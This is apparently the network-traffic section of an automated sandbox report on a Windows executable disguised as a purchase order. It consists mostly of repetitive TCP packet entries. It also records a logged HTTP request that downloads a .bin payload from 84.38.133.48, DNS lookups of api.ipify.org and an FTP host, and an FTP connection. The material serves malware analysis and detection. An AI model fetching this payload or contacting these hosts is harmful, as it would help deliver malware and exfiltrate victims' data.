                                              Dec 18, 2024 11:07:28.692785025 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.692850113 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.698436022 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.698527098 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.698600054 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.698667049 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.703747034 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.703886986 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.723381042 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.723438978 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.723521948 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.723618031 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.725256920 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.725311041 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.725321054 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.725379944 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.728967905 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.729053974 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.729063988 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.729113102 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.733066082 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.733145952 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.733217001 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.733295918 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.737051964 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.737121105 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.737165928 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.737220049 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.740417004 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.740473986 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.740556955 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.740619898 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.744239092 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.744297981 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.744313002 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.744368076 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.748040915 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.748101950 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.748117924 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.748177052 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.751934052 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.751988888 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.752053022 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.752109051 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.755721092 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.755789042 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.755801916 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.755860090 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.759639025 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.759694099 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.759732962 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.759792089 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.763289928 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.763359070 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.838560104 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.838607073 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.838659048 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.838709116 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.840827942 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.840912104 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.840958118 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.841020107 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.845033884 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.845091105 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.845175028 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.848372936 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.848427057 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.848433971 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.848479986 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.852209091 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.852263927 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.852291107 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.852340937 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.855833054 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.855900049 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.855978966 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.856056929 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.859652996 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.859715939 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.859864950 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.859987974 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.863380909 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.863442898 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.863473892 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.863540888 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.867542028 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.867618084 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.867667913 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.867727041 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.871452093 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.871520996 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.871558905 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.871612072 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.874648094 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.874735117 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.874752998 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.874818087 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.877679110 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.877752066 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.877774000 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.877841949 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.881149054 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.881220102 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.881267071 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.881341934 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.884202957 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.884270906 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.884316921 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.884371042 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.887159109 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.887218952 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.887257099 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.887311935 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.890374899 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.890444040 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.914716005 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.914753914 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.914792061 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.914822102 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.916063070 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.916126013 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.916131020 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.916198969 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.919039011 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.919111967 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.919198990 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.919276953 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.922030926 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.922101974 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.922122002 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.922184944 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.924987078 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.925044060 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.925075054 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.925256968 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.928441048 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.928498030 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.928509951 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.928559065 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.931440115 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.931498051 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.931577921 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.931649923 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.934396982 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.934453011 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.934514046 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.934647083 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.937000036 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.937064886 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.937109947 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.937163115 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.940073967 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.940129042 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.940136909 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.940184116 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.943248034 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.943303108 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.943368912 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.943370104 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.945915937 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.945985079 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.946085930 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.946150064 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.948911905 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.948975086 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.949064016 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.949119091 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.951873064 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.951935053 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.952008963 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.952317953 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.954803944 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.954869986 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.954962015 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.955018997 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.957866907 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.957904100 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.957931042 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.957961082 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.960844994 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.960902929 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.960916042 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.960959911 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.963747025 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.963814020 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.963872910 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.963936090 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.966779947 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.966820002 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.966936111 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.969750881 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.969789028 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.969820023 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.969855070 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.972665071 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.972734928 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.034619093 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.034647942 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.034712076 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.034738064 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.035923004 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.035979986 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.036042929 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.036098957 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.038826942 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.038885117 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.038886070 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.038938999 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.041769981 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.041826010 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.041892052 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.041943073 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.044552088 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.044608116 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.044698000 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.044764996 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.047596931 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.047672033 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.047745943 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.047801971 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.050322056 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.050389051 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.050436974 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.050491095 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.053174019 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.053229094 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.053247929 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.053293943 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.055924892 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.055999041 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.056008101 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.056083918 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.058588982 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.058665037 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.058717012 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.058778048 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.061548948 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.061605930 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.061641932 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.061685085 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.063906908 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.063973904 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.064011097 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.064073086 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.066262960 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.066325903 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.066378117 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.066472054 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.068763971 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.068856955 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.068928957 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.068999052 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.071352005 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.071423054 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.071466923 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.071517944 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.073698997 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.073771000 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.073848009 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.073910952 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.075752974 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.075824976 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.075901031 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.075965881 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.077956915 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.078039885 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.078095913 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.078222990 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.080518007 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.080575943 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.080584049 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.080631018 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.082425117 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.082479954 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.082494020 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.082542896 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.084778070 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.084815979 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.084840059 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.084868908 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.086774111 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.086843967 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.086863995 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.086934090 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.088967085 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.089030981 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.089046001 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.089102983 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.091195107 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.091264963 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.091336966 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.091398001 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.092641115 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.092705965 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.092734098 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:29.092798948 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:29.605180025 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:29.605236053 CET44349759104.26.12.205192.168.2.4
                                              Dec 18, 2024 11:07:29.605484962 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:29.622454882 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:29.622473955 CET44349759104.26.12.205192.168.2.4
                                              Dec 18, 2024 11:07:30.841131926 CET44349759104.26.12.205192.168.2.4
                                              Dec 18, 2024 11:07:30.841248035 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:30.843880892 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:30.843899965 CET44349759104.26.12.205192.168.2.4
                                              Dec 18, 2024 11:07:30.844185114 CET44349759104.26.12.205192.168.2.4
                                              Dec 18, 2024 11:07:30.887723923 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:30.903805017 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:30.947335005 CET44349759104.26.12.205192.168.2.4
                                              Dec 18, 2024 11:07:31.273915052 CET44349759104.26.12.205192.168.2.4
                                              Dec 18, 2024 11:07:31.274066925 CET44349759104.26.12.205192.168.2.4
                                              Dec 18, 2024 11:07:31.274481058 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:31.280457973 CET49759443192.168.2.4104.26.12.205
                                              Dec 18, 2024 11:07:32.891582966 CET4976721192.168.2.4192.185.13.234
                                              Dec 18, 2024 11:07:33.011343002 CET2149767192.185.13.234192.168.2.4
                                              Dec 18, 2024 11:07:33.011428118 CET4976721192.168.2.4192.185.13.234
                                              Dec 18, 2024 11:07:33.015301943 CET4976721192.168.2.4192.185.13.234
                                              Dec 18, 2024 11:07:33.183453083 CET2149767192.185.13.234192.168.2.4
                                              Dec 18, 2024 11:07:33.183866024 CET4976721192.168.2.4192.185.13.234
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 18, 2024 11:07:29.461946964 CET6172853192.168.2.41.1.1.1
                                              Dec 18, 2024 11:07:29.599057913 CET53617281.1.1.1192.168.2.4
                                              Dec 18, 2024 11:07:32.174330950 CET4987353192.168.2.41.1.1.1
                                              Dec 18, 2024 11:07:32.890166998 CET53498731.1.1.1192.168.2.4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 18, 2024 11:07:29.461946964 CET192.168.2.41.1.1.10x8b48Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Dec 18, 2024 11:07:32.174330950 CET192.168.2.41.1.1.10x2715Standard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 18, 2024 11:07:29.599057913 CET1.1.1.1192.168.2.40x8b48No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              Dec 18, 2024 11:07:29.599057913 CET1.1.1.1192.168.2.40x8b48No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              Dec 18, 2024 11:07:29.599057913 CET1.1.1.1192.168.2.40x8b48No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              Dec 18, 2024 11:07:32.890166998 CET1.1.1.1192.168.2.40x2715No error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 11:07:32.890166998 CET1.1.1.1192.168.2.40x2715No error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                              • api.ipify.org
                                              • 84.38.133.48
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.44975284.38.133.48802128C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 18, 2024 11:07:27.033941984 CET178OUTGET /LSOzHkHtJlArws124.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: 84.38.133.48
                                              Cache-Control: no-cache
                                              Dec 18, 2024 11:07:28.264004946 CET1236INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Last-Modified: Wed, 18 Dec 2024 09:18:40 GMT
                                              Accept-Ranges: bytes
                                              ETag: "acd0cfd32d51db1:0"
                                              Server: Microsoft-IIS/8.5
                                              Date: Wed, 18 Dec 2024 10:07:26 GMT
                                              Content-Length: 241728
